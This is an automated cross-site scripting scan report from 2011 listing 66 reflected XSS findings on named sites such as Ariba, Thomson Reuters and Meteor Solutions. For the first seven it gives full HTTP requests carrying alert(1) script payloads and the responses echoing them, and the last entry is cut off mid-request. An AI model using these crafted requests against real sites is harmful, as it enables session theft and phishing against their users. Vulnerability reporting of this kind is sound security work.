XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-06

Report generated by XSS.CX at Tue Oct 18 14:17:33 CDT 2011.



1. Cross-site scripting (reflected)

1.1. https://app.suppliergateway.com/genReg/MControl.WebPages.aspx [Res parameter]

1.2. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

1.3. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

1.4. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

1.5. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

1.6. http://cdnt.meteorsolutions.com/api/multi_track [name of an arbitrarily supplied request parameter]

1.7. http://cdnt.meteorsolutions.com/api/multi_track [query_string_tag_key parameter]

1.8. http://cdnt.meteorsolutions.com/api/multi_track [url_storage_source parameter]

1.9. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

1.10. https://cert.webtrust.org/SealFile [seal parameter]

1.11. https://cert.webtrust.org/ViewSeal [id parameter]

1.12. https://connect.ariba.com/AC [name of an arbitrarily supplied request parameter]

1.13. https://connect.ariba.com/AC_Login/ [IsErr parameter]

1.14. https://connect.ariba.com/AC_Login/ [name of an arbitrarily supplied request parameter]

1.15. https://connect.ariba.com/AC_Login/ [sc parameter]

1.16. https://connect.ariba.com/AC_Login/ [sc parameter]

1.17. https://connect.ariba.com/AC_Login/ [u parameter]

1.18. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

1.19. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

1.20. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.21. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.22. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.23. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

1.24. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

1.25. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

1.26. https://cvmas13.cvmsolutions.com/gd/ [name of an arbitrarily supplied request parameter]

1.27. http://kbportal.thomson.com/display/2/loginSecure.aspx [catURL parameter]

1.28. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchby parameter]

1.29. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchstring parameter]

1.30. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchtype parameter]

1.31. http://kbportal.thomson.com/display/2/loginSecure.aspx [t parameter]

1.32. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [cpid parameter]

1.33. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [t parameter]

1.34. http://unitedsupplierdiversity.aecglobal.com/Popup/NaicsCodePopup.aspx [ParentAddFuntionName parameter]

1.35. http://unitedsupplierdiversity.aecglobal.com/Popup/categorypopup.aspx [ParentAddFuntionName parameter]

1.36. http://unitedsupplierdiversity.aecglobal.com/Popup/serviceareapopup.aspx [ParentAddFuntionName parameter]

1.37. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

1.38. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

1.39. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

1.40. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

1.41. http://www.ariba.com/404.cfm [pageLocation parameter]

1.42. http://www.ariba.com/404.cfm [pageLocation parameter]

1.43. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

1.44. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]

1.45. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

1.46. http://www.ariba.com/legal/en_webtrust.cfm [7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter]

1.47. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

1.48. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]

1.49. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

1.50. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]

1.51. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

1.52. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]

1.53. http://www.ariba.com/services/support.cfm [x parameter]

1.54. http://www.ariba.com/services/support.cfm [x parameter]

1.55. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

1.56. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]

1.57. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

1.58. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]

1.59. https://www.bidsync.com/SupplierRegister [REST URL parameter 1]

1.60. https://www.bidsync.com/favicon.ico [REST URL parameter 1]

1.61. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

1.62. http://www.ariba.com/contact.cfm [CAMPID cookie]

1.63. http://www.ariba.com/legal/en_webtrust.cfm [CAMPID cookie]

1.64. http://www.ariba.com/roles/it.cfm [CAMPID cookie]

1.65. http://www.ariba.com/services/support.cfm [CAMPID cookie]

1.66. http://www.ariba.com/solutions/ [CAMPID cookie]



1. Cross-site scripting (reflected)
There are 66 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://app.suppliergateway.com/genReg/MControl.WebPages.aspx [Res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://app.suppliergateway.com
Path:   /genReg/MControl.WebPages.aspx

Issue detail

The value of the Res request parameter is copied into the HTML document as plain text between tags. The payload 408a1<script>alert(1)</script>ae62de57932 was submitted in the Res parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /genReg/MControl.WebPages.aspx?Res=SetFocus.js408a1<script>alert(1)</script>ae62de57932 HTTP/1.1
Host: app.suppliergateway.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://app.suppliergateway.com/genReg/registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=onvrizm2ofkfwe45o2a2rvq3; starttime=10/18/2011 1:29:12 PM; mySession=3b9fa546-1544-46cd-b35b-8660f7a1afe5

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:39:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Content-Length: 134

alert("Could not load resource 'SetFocus.js408a1<script>alert(1)</script>ae62de57932': Value cannot be null. Parameter name: stream");

1.2. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://careers.thomsonreuters.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 153e3%0aalert(1)//9c6d97a8d56 was submitted in the id parameter. This input was echoed as 153e3
alert(1)//9c6d97a8d56
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workarea/java/ektronJs.ashx?id=EktronFlexMenuJS+EktronModalJS153e3%0aalert(1)//9c6d97a8d56 HTTP/1.1
Host: careers.thomsonreuters.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://careers.thomsonreuters.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1318953642520; s_cc=true; __utma=263655443.287320647.1318952180.1318953528.1318958637.3; __utmb=263655443.7.10.1318958637; __utmc=263655443; __utmz=263655443.1318958637.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=reuters%20supplier; s_sq=devthcorp%3D%2526pid%253Dgeneral_inquiries%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcareers.thomsonreuters.com%25252F%2526ot%253DA%26trcorp2%3D%2526pid%253Dabout%25252Fcontact_us%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstaging.thomsonreuters.com%25252Fgeneral_inquiries%25252F%2526ot%253DA; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=careers.thomsonreuters.com&SiteLanguage=1033; EktGUID=8427c5dc-960b-42ab-ac66-5e9250becc09; EkAnalytics=newuser; ASP.NET_SessionId=h2rbea55w0wthj55lv4duz55

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 51603
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 17 Oct 2012 17:27:14 GMT
Last-Modified: Tue, 18 Oct 2011 17:27:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 18 Oct 2011 17:27:14 GMT

function ekFlexMenu_classNames(){}ekFlexMenu_classNames.button="ekflexmenu_button";ekFlexMenu_classNames.buttonHover="ekflexmenu_button_hover";ekFlexMenu_classNames.buttonSelected="ekflexmenu_button_s
...[SNIP]...
gWindow.scrollTo(0,10000000)};

//################################################################
//ektron registered javascript: js file does not exist at specified path (404)
//id: EktronModalJS153e3
alert(1)//9c6d97a8d56

//path:
//################################################################


1.3. http://careers.thomsonreuters.com/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://careers.thomsonreuters.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 8b293<script>alert(1)</script>6e2d80a3a45 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=8b293<script>alert(1)</script>6e2d80a3a45 HTTP/1.1
Host: careers.thomsonreuters.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://careers.thomsonreuters.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1318953642520; s_cc=true; __utma=263655443.287320647.1318952180.1318953528.1318958637.3; __utmb=263655443.7.10.1318958637; __utmc=263655443; __utmz=263655443.1318958637.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=reuters%20supplier; s_sq=devthcorp%3D%2526pid%253Dgeneral_inquiries%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcareers.thomsonreuters.com%25252F%2526ot%253DA%26trcorp2%3D%2526pid%253Dabout%25252Fcontact_us%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstaging.thomsonreuters.com%25252Fgeneral_inquiries%25252F%2526ot%253DA; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=careers.thomsonreuters.com&SiteLanguage=1033; EktGUID=8427c5dc-960b-42ab-ac66-5e9250becc09; EkAnalytics=newuser; ASP.NET_SessionId=h2rbea55w0wthj55lv4duz55

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 277
Content-Type: application/javascript; charset=utf-8
Expires: Wed, 17 Oct 2012 17:27:12 GMT
Last-Modified: Tue, 18 Oct 2011 17:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 18 Oct 2011 17:27:11 GMT

//################################################################
//ektron registered javascript: js file does not exist at specified path (404)
//id: 8b293<script>alert(1)</script>6e2d80a3a45
//path:
//################################################################


1.4. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 868ae<script>alert(1)</script>e099352b230 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FmG2EmicrosoftG2EcomG2FOffice365G2FoofofficephotoG2FenG2DUSG2FgalleryG2EmspxG23fbidG3DoeXUNV1U7uAG26mtagG3DmbarG2Demail&shorten=tinyurl&id=1868ae<script>alert(1)</script>e099352b230&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:38 GMT
Etag: "b3169d0e8a28756971b17a901f7b337472c66a74"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/qhtqaa", "id": "1868ae<script>alert(1)</script>e099352b230", "persist": "http://meme.ms/persist?key=b4TaeuFWZrWi8uxs5u9X2w"}, 1);

1.5. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 93762<script>alert(1)</script>4d4f59b3a04 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FmG2EmicrosoftG2EcomG2FOffice365G2FoofofficephotoG2FenG2DUSG2FgalleryG2EmspxG23fbidG3DoeXUNV1U7uAG26mtagG3DmbarG2Demail&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B93762<script>alert(1)</script>4d4f59b3a04 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:41 GMT
Etag: "078a08ec55655de623dc81e38c29a1fe74cccdb6"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/qhtqaa", "id": "1", "persist": "http://meme.ms/persist?key=b4TaeuFWZrWi8uxs5u9X2w"}, 1);93762<script>alert(1)</script>4d4f59b3a04

1.6. http://cdnt.meteorsolutions.com/api/multi_track [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1b0b<script>alert(1)</script>4259a824be9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hash&query_string_tag_key=CR_CC&query_string_tag_key=cr_cc&query_string_tag_key=mtag&c1b0b<script>alert(1)</script>4259a824be9=1 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:40 GMT
Etag: "f13c0f7df6a73801af4956d3f038dd5a12c4b073"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 475
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.tracking.cdnt_data={"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CC", "cr_cc", "mtag"], "c1b0b<script>alert(1)</script>4259a824be9": "1", "url_storage_source": "hash"});}

1.7. http://cdnt.meteorsolutions.com/api/multi_track [query_string_tag_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The value of the query_string_tag_key request parameter is copied into the HTML document as plain text between tags. The payload d05c9<script>alert(1)</script>95ea4625fe1 was submitted in the query_string_tag_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hash&query_string_tag_key=CR_CCd05c9<script>alert(1)</script>95ea4625fe1&query_string_tag_key=cr_cc&query_string_tag_key=mtag HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; 